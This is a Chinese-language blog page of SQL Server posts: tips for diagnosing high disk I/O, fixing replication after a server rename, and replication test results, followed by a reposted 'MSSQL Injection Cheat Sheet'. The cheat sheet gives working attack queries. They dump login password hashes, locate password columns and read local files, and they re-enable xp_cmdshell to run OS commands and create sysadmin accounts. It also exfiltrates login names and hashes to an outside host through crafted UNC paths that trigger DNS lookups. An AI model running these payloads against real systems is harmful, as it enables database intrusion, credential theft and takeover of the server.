Showing posts with label mssql. Show all posts
Showing posts with label mssql. Show all posts

Thursday, June 10, 2010

关于MSSQL I/O写入次数很高问题的分析


  1. 看一下task manager, 如果Sql Server 占有的内存即使在服务器最忙得时候都不超过2GB, 而你有4GB内存,可以考虑在Windows boot.ini启动文件中加入 /3GB变量。这样SqlServer就可以使用3GB的内存,多1GB意味着更大的缓存,可以不用到Disk取频繁读取了.

  2. 运行Perfmon,加入“Page Life Expectancy”如果这个值始终小于300秒,意味着你需要更大的内存,加入“Buffer Cache hit ratio” 如果这个值小于90%,意味着你需要更大的内存.加入 “Average Disk Queue length” 如果总是大于2,意味着磁盘操作需要排队完成。考虑升级存储设备.

  3. 运行profiler,跟踪器只选Stored procedure 和 T-Sql, 在Filter(过滤) tab, 选duration(时长)大于5000,这告诉跟踪器只捕捉运行时间超过5秒的程序。 你可以根据自己的情况调整这个变量。目的是找到制造麻烦的SQL.

  4. 运行sp_who2 ,看blk by 栏, 如果这栏不是空白, 有一个数字, 这就是造成阻塞(blocking)的线程id. 然后运行DBCC Inputbuffer(线程id), 你就可以看见这个线程在干什么。

  5. 确认你的客户端程序使用connection pooling,并在完成任务后关闭连接。Sqlserver默认255个连接,如果使用connection pooling, 这个值应该足够应付大多数情况。 如果你确认255不够,可以使用sp_configure重设这个值

  6. 以上都是在认为你完成数据库日常维护的前提下。 如果你不做日常维护,请立即开始。 经常用 DBCC indexDefrag. 每隔一段时间用DBCC DBREINDEX 重建 index. 你可以运行 DBCC Showcontig, 然后看Scan Density ,如果主要的大表Scan Density < 40%, 意味着你有严重的Fragmentation(碎片),该用DBCC REINDEX去整理了.
    DBCC SHOWCONTIG 执行后,结果全部类似下面片断
    [cc lang='text' line_numbers='false']DBCC SHOWCONTIG 正在扫描 'sysobjects' 表...
    表: 'sysobjects'(1);索引 ID: 1,数据库 ID: 12
    已执行 TABLE 级别的扫描。
    - 扫描页数.....................................: 586
    - 扫描扩展盘区数...............................: 91
    - 扩展盘区开关数...............................: 585
    - 每个扩展盘区上的平均页数.....................: 6.4
    - 扫描密度[最佳值:实际值]....................: 12.63%[74:586]
    - 逻辑扫描碎片.................................: 47.27%
    - 扩展盘区扫描碎片.............................: 97.80%
    - 每页上的平均可用字节数.......................: 2209.8
    - 平均页密度(完整)...........................: 72.70%[/cc]


Read more »
Posted by at No comments:
Labels: , , ,

Thursday, May 13, 2010

计算机改名,SQL Server 2005不能做复制

问题:计算机名修改之后,做复制时报错,错误如下:
SQL Server 复制需要有实际的服务器名称才能连接到服务器。不支持通过服务器别名、IP 地址或任何其他备用名称进行连接。请指定实际的服务器名称“xxxx”。 (Replication.Utilities)

解决方法

  1. sys.sysservers 查看列 svrname 可以发现不是新的计算机名,问题就出在此处。

  2. 先用 sp_dropserver 删除服务器,语句:EXEC sp_dropserver '老计算机名'

  3. 再用 sp_addserver 添加新的服务器,语句:EXEC SP_ADDSERVER '新计算机名','LOCAL'

  4. 最后重启SQL SERVER 服务,问题解决。

Posted by at No comments:
Labels: , ,

Tuesday, May 4, 2010

SQL Server 2005复制

一、基本的功能测试:
DML操作同步:

  1. 有主键表的增/删/改数据同步(同步正常)

  2. 无主键表的增/删/改数据同步(无主键不能作同步复制,必须将每一张表加主键,否则无法配置到同步环境)

  3. 包含索引的表的增/删/改数据同步(同步正常)

  4. 包含触发器的表的增/删/改数据同步(如果A表包含有触发器,当增加记录时向B表插入数据,备库上会报错)

  5. 包含级连删除/修改数据的表的删/改数据同步 (同步正常)

  6. 包含大对象数据的表增/删/改数据同步(同步正常)

Read more »
Posted by at No comments:
Labels: , , ,

Tuesday, February 9, 2010

MSSQL Injection Cheat Sheet
































































































































VersionSELECT @@version
CommentsSELECT 1 -- comment
SELECT /*comment*/1
Current UserSELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List UsersSELECT name FROM master..syslogins
List Password HashesSELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
List PrivilegesImpossible?
List DBA AccountsTODO
SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin?  returns 1 for true, 0 for false, NULL for invalid role.  Also try 'bulkadmin', 'systemadmin' and other values from thedocumentation
SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
Current DatabaseSELECT DB_NAME()
List DatabasesSELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
List ColumnsSELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable
List TablesSELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable
Find Tables From Column Name-- NB: This example works only for the current database.  If you wan't to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'
Select Nth RowSELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row
Select Nth CharSELECT substring('abcd', 3, 1) -- returns c
Bitwise ANDSELECT 6 & 2 -- returns 2
SELECT 6 & 1 -- returns 0
ASCII Value -> CharSELECT char(0x41) -- returns A
Char -> ASCII ValueSELECT ascii('A') - returns 65
CastingSELECT CAST('1' as int);
SELECT CAST(1 as char)
String ConcatenationSELECT 'A' + 'B' - returns AB
If StatementIF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1
Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
Avoiding QuotesSELECT char(65)+char(66) -- returns AB
Time DelayWAITFOR DELAY '0:0:5' -- pause for 5 seconds
Make DNS Requestsdeclare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000

declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005

-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary.
-- Also check out theDNS tunnel feature of sqlninja
Command ExecutionEXEC xp_cmdshell 'net user'; -- priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv
Local File AccessCREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
DROP TABLE mydata;
Hostname, IP AddressSELECT HOST_NAME()
Create UsersEXEC sp_addlogin 'user', 'pass'; -- priv
Drop UsersEXEC sp_droplogin 'user'; -- priv
Make User DBAEXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv
Location of DB filesTODO
Posted by at No comments:
Labels: , , , , , ,
Subscribe to: Comments (Atom)